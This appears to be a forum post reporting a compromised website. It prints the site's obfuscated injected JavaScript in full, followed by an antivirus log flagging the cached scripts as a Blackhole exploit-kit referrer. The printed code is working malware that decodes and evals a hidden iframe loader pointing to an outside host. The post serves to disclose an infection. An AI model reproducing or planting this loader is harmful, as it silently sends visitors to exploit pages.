http://singer-music.at/

fireold

1. 
   
2. /*f82c4e*/
   
3. bv = (5 - 3 - 1);
   
4. aq = "0" + "x";
   
5. sp = "spli" + "t";
   
6. w = window;
   
7. ff = String;
   
8. z = "dy";
   
9. try {
   
10.     --document["\x62o" + z]
    
11. } catch (d21vd12v) {
    
12.     vzs = false;
    
13.     try {
    
14.         document;
    
15.     } catch (wb) {
    
16.         vzs = 152;
    
17.     }
    
18.     if (!vzs) e = w["eval"];
    
19.     if (1) {
    
20.         f = "17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,6b,6f,6a,59,62,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,6b,6f,6a,59,62,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,58,5b,58,65,58,5a,5a,25,60,69,26,41,30,2a,62,4e,2d,39,2e,25,67,5f,67,1e,32,4,1,17,6b,6f,6a,59,62,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,17,34,17,1e,58,59,6a,66,63,6c,6b,5c,1e,32,4,1,17,6b,6f,6a,59,62,25,6a,6b,70,63,5c,25,59,66,69,5b,5c,69,17,34,17,1e,27,1e,32,4,1,17,6b,6f,6a,59,62,25,6a,6b,70,63,5c,25,5f,5c,60,5e,5f,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,6b,6f,6a,59,62,25,6a,6b,70,63,5c,25,6e,60,5b,6b,5f,17,34,17,1e,28,67,6f,1e,32,4,1,17,6b,6f,6a,59,62,25,6a,6b,70,63,5c,25,63,5c,5d,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,6b,6f,6a,59,62,25,6a,6b,70,63,5c,25,6b,66,67,17,34,17,1e,28,67,6f,1e,32,4,1,4,1,17,60,5d,17,1f,18,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,6b,6f,6a,59,62,1e,20,20,17,72,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,1e,33,5b,60,6d,17,60,5b,34,53,1e,6b,6f,6a,59,62,53,1e,35,33,26,5b,60,6d,35,1e,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,6b,6f,6a,59,62,1e,20,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,6b,6f,6a,59,62,20,32,4,1,17,74,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,4a,5c,6b,3a,66,66,62,60,5c,1f,5a,66,66,62,60,5c,45,58,64,5c,23,5a,66,66,62,60,5c,4d,58,63,6c,5c,23,65,3b,58,70,6a,23,67,58,6b,5f,20,17,72,4,1,17,6d,58,69,17,6b,66,5b,58,70,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,6d,58,69,17,5c,6f,67,60,69,5c,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,60,5d,17,1f,65,3b,58,70,6a,34,34,65,6c,63,63,17,73,73,17,65,3b,58,70,6a,34,34,27,20,17,65,3b,58,70,6a,34,28,32,4,1,17,5c,6f,67,60,69,5c,25,6a,5c,6b,4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c,1f,20,17,22,17,2a,2d,27,27,27,27,27,21,29,2b,21,65,3b,58,70,6a,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,17,34,17,5a,66,66,62,60,5c,45,58,64,5c,22,19,34,19,22,5c,6a,5a,58,67,5c,1f,5a,66,66,62,60,5c,4d,58,63,6c,5c,20,4,1,17,22,17,19,32,5c,6f,67,60,69,5c,6a,34,19,17,22,17,5c,6f,67,60,69,5c,25,6b,66,3e,44,4b,4a,6b,69,60,65,5e,1f,20,17,22,17,1f,1f,67,58,6b,5f,20,17,36,17,19,32,17,67,58,6b,5f,34,19,17,22,17,67,58,6b,5f,17,31,17,19,19,20,32,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,3e,5c,6b,3a,66,66,62,60,5c,1f,17,65,58,64,5c,17,20,17,72,4,1,17,6d,58,69,17,6a,6b,58,69,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,65,58,64,5c,17,22,17,19,34,19,17,20,32,4,1,17,6d,58,69,17,63,5c,65,17,34,17,6a,6b,58,69,6b,17,22,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,22,17,28,32,4,1,17,60,5d,17,1f,17,1f,17,18,6a,6b,58,69,6b,17,20,17,1d,1d,4,1,17,1f,17,65,58,64,5c,17,18,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,27,23,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,20,17,20,17,20,4,1,17,72,4,1,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,74,4,1,17,60,5d,17,1f,17,6a,6b,58,69,6b,17,34,34,17,24,28,17,20,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,6d,58,69,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,19,32,19,23,17,63,5c,65,17,20,32,4,1,17,60,5d,17,1f,17,5c,65,5b,17,34,34,17,24,28,17,20,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,63,5c,65,5e,6b,5f,32,4,1,17,69,5c,6b,6c,69,65,17,6c,65,5c,6a,5a,58,67,5c,1f,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,63,5c,65,23,17,5c,65,5b,17,20,17,20,32,4,1,74,4,1,60,5d,17,1f,65,58,6d,60,5e,58,6b,66,69,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1" [sp](",");
    
21.     }
    
22.     w = f;
    
23.     s = [];
    
24.     for (i = 2 - 2; - i + 1340 != 0; i += 1) {
    
25.         j = i;
    
26.         if ((0x19 == 031)) if (e) s += ff.fromCharCode(e(aq + (w[j])) + 0xa - bv);
    
27.     }
    
28.     za = e;
    
29.     za(s)
    
30. } /*/f82c4e*/

复制代码

Avira

2013/12/2 上午 07:01 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\roe[1].js'
      包含病毒或有害的程式 'JS/BlacoleRef.NO.4' [virus]
      已採取動作：
      檔案會移動至 '5b0263be.qua' 名稱底下的隔離區目錄。.

2013/12/2 上午 07:01 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        800
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/12/2 上午 07:00 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\BM0NVITH\dragdrop[1].js'
      包含病毒或有害的程式 'JS/BlacoleRef.DH.1' [virus]
      已採取動作：
      檔案會移動至 '4d7d4e63.qua' 名稱底下的隔離區目錄。.

2013/12/2 上午 07:00 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\Q4CFJPIR\builder[1].js'
      包含病毒或有害的程式 'JS/BlacoleRef.DH.1' [virus]
      已採取動作：
      檔案會移動至 '541261c1.qua' 名稱底下的隔離區目錄。.

2013/12/2 上午 07:00 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        803
      目錄數：        0
      惡意程式碼數：        3
      警告數：        0

2013/12/2 上午 07:00 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A1VVYTC4\prototype[1].js'
      包含病毒或有害的程式 'JS/BlacoleRef.DH.1' [virus]
      已採取動作：
      檔案會移動至 '1ed4148b.qua' 名稱底下的隔離區目錄。.

2013/12/2 上午 07:00 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\roe[1].js 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.NO.4 [virus]'
      執行的動作：傳輸至掃描程式

2013/12/2 上午 07:00 [Web Protection] 發現惡意程式碼
      從 URL "http://www.singer-music.at/index_htm_files/roe.js" 存取資料時，
      發現病毒或有害的程式 'JS/BlacoleRef.NO.4' [virus]。
      已採取動作：已略過

2013/12/2 上午 07:00 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\roe[1].js 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.NO.4 [virus]'
      執行的動作：拒絕存取

2013/12/2 上午 07:00 [Web Protection] 發現惡意程式碼
      從 URL "http://www.singer-music.at/index_htm_files/roe.js" 存取資料時，
      發現病毒或有害的程式 'JS/BlacoleRef.NO.4' [virus]。
      已採取動作：已略過

fs is